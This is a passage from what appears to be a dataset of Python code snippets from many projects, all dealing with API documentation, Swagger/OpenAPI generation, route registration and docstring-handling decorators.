\"defaultModelExpandDepth\": 5}\n if \"schemes\" in setup_swagger_sign.parameters:\n kwargs[\"schemes\"] = self.config.swagger_ui_schemes\n\n aiohttp_swagger.setup_swagger(\n app=self.app,\n description=\"API for finding appointments timeslots for SNCT vehicule inspection\",\n title=\"SNCT Appointments API\",\n api_version=\"1.0\",\n contact=\"acecile@letz-it.lu\",\n swagger_url=swagger_url,\n **kwargs\n )\n\n # Setup CORS\n if self.config.allow_origin:\n self.cors = aiohttp_cors.setup(\n self.app,\n defaults={self.config.allow_origin: aiohttp_cors.ResourceOptions(allow_credentials=True, expose_headers=\"*\", allow_headers=\"*\")},\n )\n for route in self.app.router.routes():\n if not isinstance(route.resource, aiohttp.web_urldispatcher.StaticResource):\n self.cors.add(route)\n\n # Print configured routes\n self.print_routes()\n\n # Setup services\n self.app.on_startup.append(self.setup_appointment_dispatcher)\n self.app.on_startup.append(self.setup_snct_appointment_scrapper)\n self.app.on_shutdown.append(self.close_snct_appointment_scrapper)\n self.app.on_startup.append(self.setup_ws_stream_coros)\n self.app.on_shutdown.append(self.close_ws_stream_coros)", "def _add_doc(func, doc):\n func.__doc__ = doc", "def route(cls, url, method='GET'):\n def route_decorator(func):\n item = (url, method, func)\n cls._docoratedRouteHandlers.append(item)\n return func\n return route_decorator", "def init_app(app):\n\n def register(path, resource):\n app.add_url_rule(path, view_func=resource.as_view(resource.__name__))\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n docs.register(resource, endpoint=resource.__name__)\n\n docs = FlaskApiSpec(app)\n register(\"/organisms\", Organisms)\n register(\"/organisms/<int:id>\", Organism)\n register(\"/strains\", Strains)\n register(\"/strains/<int:id>\", Strain)\n register(\"/experiments\", Experiments)\n register(\"/experiments/<int:id>\", Experiment)\n register(\"/experiments/<int:id>/data\", ExperimentData)\n register(\"/media\", Media)\n register(\"/media/<int:id>\", Medium)\n register(\"/media/compounds\", MediumCompounds)\n register(\"/media/compounds/<int:id>\", MediumCompound)\n register(\"/conditions\", Conditions)\n register(\"/conditions/<int:id>\", Condition)\n register(\"/conditions/<int:id>/data\", ConditionData)\n register(\"/samples\", Samples)\n register(\"/samples/<int:id>\", Sample)\n register(\"/fluxomics\", Fluxomics)\n register(\"/fluxomics/batch\", FluxomicsBatch)\n register(\"/fluxomics/<int:id>\", Fluxomic)\n register(\"/metabolomics\", Metabolomics)\n register(\"/metabolomics/batch\", MetabolomicsBatch)\n register(\"/metabolomics/<int:id>\", Metabolomic)\n register(\"/proteomics\", Proteomics)\n register(\"/proteomics/batch\", ProteomicsBatch)\n register(\"/proteomics/<int:id>\", Proteomic)\n register(\"/uptake-secretion-rates\", UptakeSecretionRates)\n register(\"/uptake-secretion-rates/<int:id>\", UptakeSecretionRate)\n register(\"/molar-yields\", MolarYields)\n register(\"/molar-yields/<int:id>\", MolarYield)\n register(\"/growth-rates\", GrowthRates)\n register(\"/growth-rates/<int:id>\", GrowthRate)", "def api_html():\n\n return jsonify({'version': __version__})", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def generate_api_docs(self):\n if self.API_OUTPUT_DIR:\n args = [\n # Put documentation for each module on its own page\n '-e',\n # don't create the \"modules.rst\" file (the table of contents\n # file) as this is already provided by the package's main rst\n # file.\n '-T',\n # Overwrite existing files\n '--force',\n '-o', self.API_OUTPUT_DIR,\n # the package to generate docs from\n self.PROJECT_DIR\n ]\n excludes = [\n os.path.join(self.PROJECT_DIR, p)\n if not os.path.isabs(p) else p\n for p in self.API_EXCLUDE_DIRS\n ]\n apidoc.main(args + excludes)", "def addRouteDocs(resource, route, method, info, handler):\n # Convert wildcard tokens from :foo form to {foo} form.\n convRoute = []\n for token in route:\n if token[0] == ':':\n convRoute.append('{{{}}}'.format(token[1:]))\n else:\n convRoute.append(token)\n\n path = '/'.join(['', resource] + convRoute)\n\n info = info.copy()\n info['httpMethod'] = method.upper()\n\n if not 'nickname' in info:\n info['nickname'] = handler.__name__\n\n # Add the operation to the given route\n if not path in routes[resource]:\n routes[resource][path] = []\n\n routes[resource][path].append(info)\n discovery.add(resource)", "def generate_patch_build(self, domain):\n # TODO change name of def\n base_path = self.paths[\"api_doc_dir\"]\n self.generate_apidoc_patches()\n from django_swagger_utils.apidoc_gen.generators.patch_generator import PatchGenerator\n patch_generator = PatchGenerator(self.app_name, self.parser, self.paths, base_path)\n patch_generator.filter_for_deleted_apis()\n\n process = subprocess.Popen(['which', 'apidoc'], stdout=subprocess.PIPE)\n\n output = process.communicate()[0]\n if output:\n\n with open(self.paths[\"base_dir\"] + \"/apidoc.json\", 'w') as outfile:\n apidoc_content = {\"url\": \"https://ib-backend-dev.apigateway.in\",\n \"version\": \"0.0.1\",\n \"description\": \"\",\n \"name\": \"iBHubs_backend API Documentation\",\n \"title\": \"iBHubs_backend Documenation\"}\n json.dump(apidoc_content, outfile, indent=4)\n # by default we assume user is working at no specific branch so we fix\n # url to default above url as above , then we check if any specific parametr is given\n # and replace url with required url\n if domain != '' and domain:\n with open(self.paths[\"apidoc\"]) as src_json:\n apidoc_content = json.load(src_json)\n apidoc_content['url'] = \"https://\" + domain\n with open(self.paths[\"apidoc\"], 'w') as outfile:\n json.dump(apidoc_content, outfile, indent=4)\n try:\n os.mkdir(\"docs\")\n except OSError:\n pass\n # the below command is responsible for creating docs\n process = subprocess.Popen(['apidoc', '-i', self.base_dir,\n '-o', os.path.join(self.base_dir, 'docs'),\n '-e', 'django_swagger_utils/*',\n '-e', 'static/*',\n ], stdout=subprocess.PIPE)\n print process.communicate()[0]\n ################################################\n # hosting apidoc\n ################################################\n # obtaining the path of static folder of django-swagger-utils\n # django_swagger_utils_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\n # static_folder_path = os.path.join(django_swagger_utils_path, \"static\")\n # import shutil\n # # create a folder apidoc , delete if previously exists\n # if os.path.exists(os.path.join(static_folder_path, \"apidoc\")):\n # shutil.rmtree(os.path.join(static_folder_path, \"apidoc\"))\n # apidoc_path = os.path.join(static_folder_path, \"apidoc\")\n #\n # os.mkdir(apidoc_path)\n\n # from distutils.dir_util import copy_tree\n # copydocs from docs to apidoc in swagger utils\n # try:\n # copy_tree(os.path.join(self.base_dir, 'docs'), apidoc_path)\n # except Exception as err:\n # print err\n\n # browse to localhost:<port>/static/apidoc/index.html\n\n else:\n raise CommandError(\"Help: Install apidoc: [ sudo npm install -g apidoc ]\")", "def click_doc(arg):\n import inspect\n\n def decorator(function):\n if type(arg) is str:\n function.__doc__ = arg\n elif inspect.isclass(arg):\n function.__doc__ = arg.__doc__\n else:\n function.__doc__ = None\n return function\n\n return decorator", "def subaction(*args, **kwargs):\n operation_description = kwargs.pop('description', None)\n response_code = kwargs.pop('response_code', None)\n response_serializer = kwargs.pop(\n 'response_serializer', kwargs.get('serializer_class', None)\n )\n assert (\n (response_code is None) or\n (response_code is not None and response_serializer is not None)\n ), \"If `response_code` was setted, `response_serializer` should be setted too.\"\n\n def decorator(func: _t.Callable):\n func_object = action(*args, **kwargs)(func)\n override_kw = {}\n if response_code:\n override_kw['responses'] = {\n response_code: response_serializer()\n }\n if operation_description:\n override_kw['operation_description'] = operation_description\n else:\n override_kw['operation_description'] = str(func.__doc__ or '').strip() # type: ignore\n return swagger_auto_schema(**override_kw)(func_object) # type: ignore\n\n return decorator", "def openapi_view(view: View, info: ViewDeriverInfo) -> View:\n if info.options.get(\"openapi\"):\n\n def wrapper_view(context: Context, request: Request) -> Response:\n # We need this to be able to raise AttributeError if view code\n # accesses request.openapi_validated on a view that is marked\n # with openapi=False\n request.environ[\"pyramid_openapi3.enabled\"] = True\n\n # If view is marked with openapi=True (i.e. we are in this\n # function) and registry settings are not set to disable\n # validation, then do request/response validation\n request.environ[\"pyramid_openapi3.validate_request\"] = asbool(\n request.registry.settings.get(\n \"pyramid_openapi3.enable_request_validation\", True\n )\n )\n request.environ[\"pyramid_openapi3.validate_response\"] = asbool(\n request.registry.settings.get(\n \"pyramid_openapi3.enable_response_validation\", True\n )\n )\n\n # Request validation can happen already here, but response validation\n # needs to happen later in a tween\n if request.openapi_validated and request.openapi_validated.errors:\n raise RequestValidationError(errors=request.openapi_validated.errors)\n\n # Do the view\n return view(context, request)\n\n return wrapper_view\n return view", "def PublicAPI(*args, **kwargs):\n if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):\n return PublicAPI(stability='stable')(args[0])\n if 'stability' in kwargs:\n stability = kwargs['stability']\n assert stability in ['stable', 'experimental'], stability\n elif kwargs:\n raise ValueError(f'Unknown kwargs: {kwargs.keys()}')\n else:\n stability = 'stable'\n\n def wrap(obj):\n if stability == 'experimental':\n message = f'PublicAPI ({stability}): This API is {stability} and may change before becoming stable.'\n else:\n message = 'PublicAPI: This API is stable across Ludwig releases.'\n _append_doc(obj, message=message)\n _mark_annotated(obj)\n return obj\n return wrap", "def _write_member_documentation_pages(\n documenter: sphinx.ext.autodoc.Documenter):\n for entry in _get_documenter_members(documenter):\n if entry.is_inherited:\n continue\n if (entry.overload and entry.overload.overload_id and\n re.fullmatch('[0-9]+', entry.overload.overload_id)):\n logger.warning('Unspecified overload id: %s', entry.object_name)\n member_rst_path = os.path.join(documenter.env.app.srcdir, 'python', 'api',\n entry.page_name + '.rst')\n objtype = entry.documenter.objtype\n member_content = ''\n if objtype == 'class':\n member_content += ':duplicate-local-toc:\\n\\n'\n member_content += sphinx_utils.format_directive(\n 'tensorstore-python-apidoc',\n options=dict(\n fullname=entry.full_name,\n objtype=objtype,\n importname=entry.import_name,\n objectdescription=True,\n subscript=entry.subscript,\n overload=cast(ParsedOverload, entry.overload).overload_id,\n ),\n )\n pathlib.Path(member_rst_path).write_text(member_content)\n _write_member_documentation_pages(entry.documenter)", "def test_successful_parse_undocumented_endpoints(monkeypatch) -> None:\n monkeypatch.setattr(django_settings, 'SWAGGER_TESTER', {'PATH': yml_path})\n monkeypatch.setattr('django_swagger_tester.static_schema.loader.LoadStaticSchema.get_schema', ret_schema)\n for url in ['/api/v1/cars/incorrect/', '/api/v1/trucks/incorrect/']:\n base = LoadStaticSchema(url, 'get', status_code=200)\n base.get_response_schema()", "def get_openapi_spec(self):\n\n spec = {\"operationId\": snake_to_camel(self._wrapped_function.__name__), \"responses\": {}}\n\n if self._doc.short_description:\n spec[\"summary\"] = self._doc.short_description\n\n if self._doc.long_description:\n spec[\"description\"] = self._doc.long_description\n\n if self._tags:\n spec[\"tags\"] = self._tags\n\n if self._path_parameters or self._query_parameters:\n spec[\"parameters\"] = []\n\n for name, param_type in self._path_parameters.items():\n if self._is_param_ignored(name):\n continue\n\n param_spec = {\n \"name\": name,\n \"in\": \"path\",\n \"required\": True,\n \"schema\": {\"type\": self._extension.PARAMETER_TYPE_MAP.get(param_type, \"string\")},\n }\n\n param_doc = self._get_param_doc(name)\n if param_doc is not None:\n param_spec[\"description\"] = param_doc.description\n\n spec[\"parameters\"].append(param_spec)\n\n for name, param_type in self._query_parameters.items():\n param_refl: inspect.Parameter = self._signature.parameters[name]\n param_spec = {\n \"name\": name,\n \"in\": \"query\",\n \"required\": param_refl.default == inspect.Parameter.empty,\n \"schema\": {\"type\": self._extension.PARAMETER_TYPE_MAP.get(param_type, \"string\")},\n }\n\n param_doc = self._get_param_doc(name)\n if param_doc is not None:\n param_spec[\"description\"] = param_doc.description\n\n spec[\"parameters\"].append(param_spec)\n\n if self._request_body_parameter:\n mimetypes = self._request_body_content_types\n\n spec[\"requestBody\"] = {\n \"content\": {\n mimetype: {\"schema\": self._process_model_schema(self._request_body_class)} for mimetype in mimetypes\n },\n \"required\": True,\n }\n\n if issubclass(self._request_body_class, ExamplesMixin):\n for mimetype in mimetypes:\n spec[\"requestBody\"][\"content\"][mimetype][\"examples\"] = model_examples_to_openapi_dict(\n self._request_body_class\n )\n\n param_doc = self._get_param_doc(self._request_body_parameter)\n if param_doc is not None and param_doc.description:\n spec[\"requestBody\"][\"description\"] = param_doc.description\n\n spec[\"x-codegen-request-body-name\"] = \"body\"\n elif self._request_body_file_type:\n spec[\"requestBody\"] = {\n \"content\": {self._request_body_file_type: {\"schema\": {\"type\": \"string\", \"format\": \"binary\"}}}\n }\n\n if self._security:\n spec[\"security\"] = self._security\n\n for response_class, codes in self._responses.items():\n for code, response_data in codes.items():\n if issubclass(response_class, FileResponse):\n mime = response_data.mimetype or \"application/octet-stream\"\n spec[\"responses\"][str(code)] = {\n \"description\": response_data.description or response_class.__name__,\n \"content\": {mime: {\"schema\": {\"type\": \"string\", \"format\": \"binary\"}}},\n }\n else:\n spec[\"responses\"][str(code)] = {\n \"description\": response_data.description or response_class.__name__,\n \"content\": {\"application/json\": {\"schema\": self._process_model_schema(response_class)}},\n }\n\n if issubclass(response_class, ExamplesMixin):\n # fmt: off\n spec[\"responses\"][str(code)][\"content\"][\"application/json\"][\"examples\"] = \\\n model_examples_to_openapi_dict(response_class)\n # fmt: on\n\n return spec", "def __call__(self, doc: Doc) -> Doc:\n return doc", "def __call__(self, doc: Doc) -> Doc:\n return doc", "def swagger_validate(f):\n @wraps(f)\n def swagger_validated_function(*args, **kwargs):\n converted_uri = request.path\n # convert /pet/mypetsid to /pet/{petId}\n for key, value in request.view_args.items():\n target = '{{{0}}}'.format(key)\n converted_uri = converted_uri.replace(str(value), target)\n # Grab the swagger spec for this specific uri and request type\n request_spec = spec.get_op_for_request(\n request.method.lower(), converted_uri)\n # cycle through the params and check any params that are set or required\n # by the schema\n for param in request_spec.params.values():\n param_spec = get_param_type_spec(param)\n # TODO - grab out other request types that we care about\n param_value = None\n if param.location == 'formData':\n param_value = request.form.get(param.name)\n elif param.location == 'path':\n param_value = request.view_args.get(param.name)\n if param_value or param.required:\n try:\n validate_schema_object(spec, param_spec, param_value)\n except Exception as e:\n abort(400, str(e))\n return f(*args, **kwargs)\n return swagger_validated_function", "def with_docs(self):\r\n self._configurations.append('javadoc')\r\n return self", "def configure_apispec(app):\n pass", "async def docs(self, ctx):\n embed = discord.Embed(title = \"Documentation\", description = \"[Click here to visit our documentation!](https://dhb-documentation.readthedocs.io/en/latest/index.html)\", color = discord.Color.blurple())\n await ctx.send(embed = embed)", "def __call__(self, doc):\n return doc", "def custom_openapi() -> Dict:\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"The GenomicMedLab Cool Seq Tool\",\n version=__version__,\n description=\"Common Operations On Lots-of Sequences Tool.\",\n routes=app.routes\n )\n\n openapi_schema[\"info\"][\"contact\"] = {\n \"name\": \"Alex H. Wagner\",\n \"email\": \"Alex.Wagner@nationwidechildrens.org\",\n \"url\": \"https://www.nationwidechildrens.org/specialties/institute-for-genomic-medicine/research-labs/wagner-lab\" # noqa: E501\n }\n app.openapi_schema = openapi_schema\n return app.openapi_schema", "def init_doc(self):\n raise NotImplementedError()", "def _mock_swagger(cls):\n\n swagger_patcher = patch(\n 'manager_rest.rest.swagger.add_swagger_resource'\n )\n cls._patchers.append(swagger_patcher)", "def func_doc():", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions(get, post, patch, put, delete)',\n 'Is similar to traditional Django view',\n 'Give you the most control over your app logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!', 'an_apiview':an_apiview})", "def factory_functions(self, route, docstring=\"\"):\n def generic_function(**kwargs):\n return self._get(route, params=kwargs)\n generic_function.__doc__ = docstring\n return generic_function", "def includeme(config):\n\n document_path = config.registry.settings['{}.document'.format(MODULE_NAME)]\n\n definition = api.Api(document_path)\n config.registry.registerUtility(definition, api.IApi)\n\n config.add_directive('set_media_renderer', api.set_media_renderer)\n config.add_directive('add_deserializer', api.add_deserializer)\n config.add_directive('set_media_deserializer', api.set_media_deserializer)\n\n config.add_view(\n views.exception_view,\n context=Exception,\n renderer='json',\n )\n config.add_view(\n views.http_exception_view,\n context=pyramid.httpexceptions.HTTPException,\n renderer='json',\n )\n\n return None", "def docs():", "def wrapper(*args, **kwargs):\n print(f\"you are calling the {fn.__name__} function\")\n print(f\"Here's the documentation: {fn.__doc__}\")\n return fn(*args, **kwargs)", "def get_specs(self, prefix='', status=200, **kwargs):\n return self.get_json('{0}/swagger.json'.format(prefix), status=status, **kwargs)", "def add_documentation(cls, documentation):\n cls.__doc__ = documentation.CBAMLibrary\n methods = list(filter(lambda x: not x.startswith(\"_\"), dir(cls)))\n for method_name in methods:\n method = getattr(cls, method_name)\n if callable(method):\n name = method.__name__\n if hasattr(documentation, name):\n getattr(cls, name).__doc__ = getattr(documentation, name)", "def get_documentation(self, css_path=None, base_url=None):\n if base_url is None:\n first_key = next(iter(self.conf_doc))\n conf = self.conf_doc[first_key]\n else:\n conf = self.conf_doc[\"/\" + base_url]\n\n return (\n 200,\n \"\"\"<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>%s</title>\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width\" />\n <style>%s</style>\n %s\n </head>\n <body>\n <aside>%s</aside>\n <main>%s</main>\n <section id=\"operations\">%s</section>\n <footer>%s</footer>\n </body>\n</html>\"\"\"\n % (\n self.__title(conf),\n self.__css(),\n self.__css_path(css_path),\n self.__sidebar(conf),\n self.__header(conf),\n self.__operations(conf),\n self.__footer(),\n ),\n )", "def get(self,request,format = None):\n an_apiview = [\n 'Uses HTTP methods as function (get,post,patch,put,delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your appliction logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!','an_apiview': an_apiview})", "def api():\n api_routes = [\n \"/api/v1.0/beer\",\n \"/api/v1.0/breweries\",\n ]\n return render_template(\"api.html\", api_routes = api_routes)", "def write_api_docs(self, outdir):\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n # compose list of modules\r\n modules = self.discover_modules()\r\n self.write_modules_api(modules,outdir)", "def generate_swagger_html(swagger_static_root, swagger_json_url):\n tmpl = _get_template(\"swagger.html\")\n return tmpl.render(\n swagger_root=swagger_static_root, swagger_json_url=swagger_json_url\n )", "def path_helper(self, operations, resource, base_path=None, suffix=None, **kwargs):\n resource_uri_mapping = self._generate_resource_uri_mapping(self._app, resource, suffix)\n\n if not resource_uri_mapping:\n raise APISpecError(\"Could not find endpoint for resource {0}\".format(resource))\n\n operations.update(yaml_utils.load_operations_from_docstring(resource.__doc__) or {})\n\n # In case multiple uri were found, keep the only one that has methods\n try:\n path = next(uri for uri, methods in resource_uri_mapping.items() if methods)\n except StopIteration:\n path = next(iter(resource_uri_mapping))\n\n methods = resource_uri_mapping[path]\n\n if base_path is not None:\n # make sure base_path accept either with or without leading slash\n # swagger 2 usually come with leading slash but not in openapi 3.x.x\n base_path = '/' + base_path.strip('/')\n path = re.sub(base_path, \"\", path, 1)\n\n for method_name, method_handler in methods.items():\n docstring_yaml = yaml_utils.load_yaml_from_docstring(method_handler.__doc__)\n operations[method_name] = docstring_yaml or dict()\n return path", "def main(global_config, **settings):\n config = Configurator(settings=settings)\n \n config.add_route('decorated_without_definitions', '/decorated-without-definitions')\n\n config.add_route('simple_docrequest', '/simple-docrequest')\n\n config.add_route('choices_docrequest', '/choices-docrequest')\n\n config.add_route('list_docrequest', '/list-docrequest')\n\n config.add_route('with_url_param', '/with-url-param/{url_param}')\n\n config.scan()\n return config.make_wsgi_app()", "def process_api_declaration(self, resources, resource, context):\n pass", "def api():\n\treturn \"The API call\"", "def expose(self, model, route='/api', access_control=None, resource_class=Resource, **kwargs):\n endpoint_path = route + '/' + inflection.pluralize(inflection.underscore(model.__name__))\n endpoint = endpoint_path\n resource = Resource(model=model, access_control=access_control)\n self._add_api_method(endpoint_path, resource.list_,\n methods=['GET'], endpoint=endpoint + '/list')\n self._add_api_method('%s/<id>' % endpoint_path, resource.get_,\n methods=['GET'], endpoint=endpoint + '/get')\n\n self._add_api_method(endpoint_path, resource.put_,\n methods=['PUT'], endpoint=endpoint + '/put')\n\n self._add_api_method('%s/<id>' % endpoint_path, resource.delete_,\n methods=['DELETE'], endpoint=endpoint + '/delete')\n\n self._add_api_method(endpoint_path, resource.post_,\n methods=['POST'], endpoint=endpoint + 'post')\n\n self._add_api_method('%s/<id>' % endpoint_path, resource.patch_,\n methods=['PATCH'], endpoint=endpoint + 'patch')", "def api_method(func):\n @wraps(func)\n def decorator(self, return_request_args=False, *args, **kwargs):\n request_args = func(self, *args, **kwargs)\n request_args.update({\n 'method': '{module}.{method}'.format(\n module=self.__class__.__name__,\n method=func.__name__)})\n request_args = self._preprocess(request_args)\n if return_request_args:\n return request_args\n else:\n return self.pa.request(**request_args)\n return decorator", "def _openapi_redoc(self):\n redoc_url = self.app.config.get('OPENAPI_REDOC_URL', None)\n redoc_version = self.app.config.get('OPENAPI_REDOC_VERSION', 'next')\n if redoc_url is None:\n redoc_url = (\n 'https://cdn.jsdelivr.net/npm/redoc@'\n '{}/bundles/redoc.standalone.js'.format(redoc_version))\n return render_template('redoc.html',\n title=self.app.config.get('API_TITLE', self.app.name),\n redoc_url=redoc_url)", "def document_collection(resource, path, root_discovery, discovery, css=CSS):\n collections = []\n methods = []\n resource_name = path.split(\".\")[-2]\n html = [\n \"<html><body>\",\n css,\n \"<h1>%s</h1>\" % breadcrumbs(path[:-1], root_discovery),\n \"<h2>Instance Methods</h2>\",\n ]\n\n # Which methods are for collections.\n for name in dir(resource):\n if not name.startswith(\"_\") and callable(getattr(resource, name)):\n if hasattr(getattr(resource, name), \"__is_resource__\"):\n collections.append(name)\n else:\n methods.append(name)\n\n # TOC\n if collections:\n for name in collections:\n if not name.startswith(\"_\") and callable(getattr(resource, name)):\n href = path + name + \".html\"\n html.append(\n string.Template(COLLECTION_LINK).substitute(href=href, name=name)\n )\n\n if methods:\n for name in methods:\n if not name.startswith(\"_\") and callable(getattr(resource, name)):\n doc = getattr(resource, name).__doc__\n params = method_params(doc)\n firstline = doc.splitlines()[0]\n html.append(\n string.Template(METHOD_LINK).substitute(\n name=name, params=params, firstline=firstline\n )\n )\n\n if methods:\n html.append(\"<h3>Method Details</h3>\")\n for name in methods:\n dname = name.rsplit(\"_\")[0]\n html.append(method(name, getattr(resource, name).__doc__))\n\n html.append(\"</body></html>\")\n\n return \"\\n\".join(html)", "def format_method(cls, **kwargs): \n _doc_formatter = cls._format_obj(**kwargs) \n ## using functools.wraps: this will work but the method type of any bounded\n ## function (static, instance or class method) is also altered\n #def _func_decorator(func):\n # new_func = functools.wraps(func)(func)\n # new_func.__doc__ = _doc_formatter(func)\n # return new_func\n try:\n assert USE_WRAPT_OR_NOT and wrapt\n except: \n class _func_decorator(__MethodDecorator):\n def __init__(self, func, obj=None, cls=None, method_type='function'):\n #super(_func_decorator,self).__init__(func, obj=obj, cls=cls, method_type=method_type)\n __MethodDecorator.__init__(self, func, obj=obj, cls=cls, method_type=method_type)\n # we had one attribute wrt. a standard method_decorator instance\n setattr(self,'__doc__',_doc_formatter(self.func))\n def __getattribute__(self, attr_name): \n # we ensure that the docstring which is the __doc__ attribute of the\n # decorator, not that of the function itself\n if attr_name in ('__doc__',):\n return object.__getattribute__(self, attr_name) \n # otherwise behaves like the superclass class\n #return super(_func_decorator,self).__getattribute__(attr_name)\n return __MethodDecorator.__getattribute__(self, attr_name)\n else:\n def _func_decorator(func):\n #@my_wrapper\n #def new_func(*_args, **_kwargs):\n # return func(*_args, **_kwargs)\n new_func = method_decorator(func)\n #new_func = method_wrapper(func)\n # now we update the '__doc__' by recycling the doc already commited in \n # the FunctionWrapper object new_func: this enables avoiding issues when\n # dealing with classmethod or staticmethod methods:\n # \"AttributeError: 'classmethod' object attribute '__doc__' is read-only\"\n try: # write on the wrapper...\n new_func.__doc__ = _doc_formatter(new_func)\n except: \n # still, we allow this type of error, as it may occur in the case the\n # order of closures was not well set, e.g. by implementing:\n # @classmethod\n # @Docstring.format_class(**kwargs)\n # instead of:\n # @Docstring.format_class(**kwargs)\n # @classmethod\n pass\n return new_func\n return _func_decorator", "def test_basic_api_inline_swagger(self):\n self.create_and_verify_stack(\"single/basic_api_inline_swagger\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_callable_urlconf(self):\n\n def urlpatterns():\n return (\n path(\"admin/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin/\", admin.site.urls),\n )\n\n with self.settings(ROOT_URLCONF=SimpleLazyObject(urlpatterns)):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertEqual(response.status_code, 200)", "def doc(api_url):\n res, status = dh.get_index(css_path), 404\n if any(\n api_u in \"/\" + api_url for api_u, api_dict in am.all_conf.items()\n ):\n # documentation\n if any(\n api_u == \"/\" + api_url\n for api_u, api_dict in am.all_conf.items()\n ):\n status, res = dh.get_documentation(css_path, api_url)\n return res, status\n # api calls\n else:\n cur_call = \"/\" + api_url\n format = request.args.get(\"format\")\n content_type = (\n \"text/csv\"\n if format is not None and \"csv\" in format\n else \"application/json\"\n )\n\n op = am.get_op(\n cur_call\n + \"?\"\n + unquote(request.query_string.decode(\"utf8\"))\n )\n if type(op) is Operation: # Operation found\n status, res, c_type = op.exec(content_type=content_type)\n else: # HTTP error\n status, res, c_type = op\n\n if status == 200:\n response = make_response(res, status)\n response.headers.set(\"Content-Type\", c_type)\n else:\n # The API Manager returns a text/plain message when there is an error.\n # Now set to return the header requested by the user\n if content_type == \"text/csv\":\n si = StringIO()\n cw = writer(si)\n cw.writerows(\n [[\"error\", \"message\"], [str(status), str(res)]]\n )\n response = make_response(si.getvalue(), status)\n response.headers.set(\n \"Content-Disposition\",\n \"attachment\",\n filename=\"error.csv\",\n )\n else:\n m_res = {\"error\": status, \"message\": res}\n mes = dumps(m_res)\n response = make_response(mes, status)\n response.headers.set(\n \"Content-Type\", content_type\n ) # overwrite text/plain\n\n # allow CORS anyway\n response.headers.set(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.set(\"Access-Control-Allow-Credentials\", \"true\")\n\n return response\n else:\n return res, status", "def __call__(self,\n comment,\n file,\n ):\n optional_kwargs = {}\n\n return BaseAPIEndpoint.__call__(self,\n comment=comment,\n file=file,\n **optional_kwargs\n )", "def ListaDeDocentesAPI(request):\n if request.method == 'GET':\n docentes = Docente.objects.all()\n serializer = DocenteSerializer(docentes, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = DocenteSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def document(self):\n ...", "def minimal_swagger_dict():\n return {\n 'swagger': '2.0',\n 'info': {\n 'title': 'Test',\n 'version': '1.0',\n },\n 'paths': {\n },\n 'definitions': {\n },\n }", "def decorate_HTTP_verb_method(method):\n @functools.wraps(method)\n def wrapper(self, RIC_base_uri, **kwargs):\n partition = kwargs.pop('partition', '')\n name = kwargs.pop('name', '')\n sub_path = kwargs.pop('subPath', '')\n suffix = kwargs.pop('suffix', '')\n uri_as_parts = kwargs.pop('uri_as_parts', False)\n if uri_as_parts:\n REST_uri = generate_bigip_uri(RIC_base_uri, partition, name,\n sub_path, suffix, **kwargs)\n else:\n REST_uri = RIC_base_uri\n pre_message = \"%s WITH uri: %s AND suffix: %s AND kwargs: %s\" %\\\n (method.__name__, REST_uri, suffix, kwargs)\n logging.debug(pre_message)\n response = method(self, REST_uri, **kwargs)\n post_message =\\\n \"RESPONSE::STATUS: %s Content-Type: %s Content-Encoding:\"\\\n \" %s\\nText: %r\" % (response.status_code,\n response.headers.get('Content-Type', None),\n response.headers.get('Content-Encoding', None),\n response.text)\n logging.debug(post_message)\n if response.status_code not in range(200, 207):\n error_message = '%s Unexpected Error: %s for uri: %s\\nText: %r' %\\\n (response.status_code,\n response.reason,\n response.url,\n response.text)\n raise iControlUnexpectedHTTPError(error_message, response=response)\n return response\n return wrapper", "def _docs_params(**kwds):\n\n def dec(obj):\n 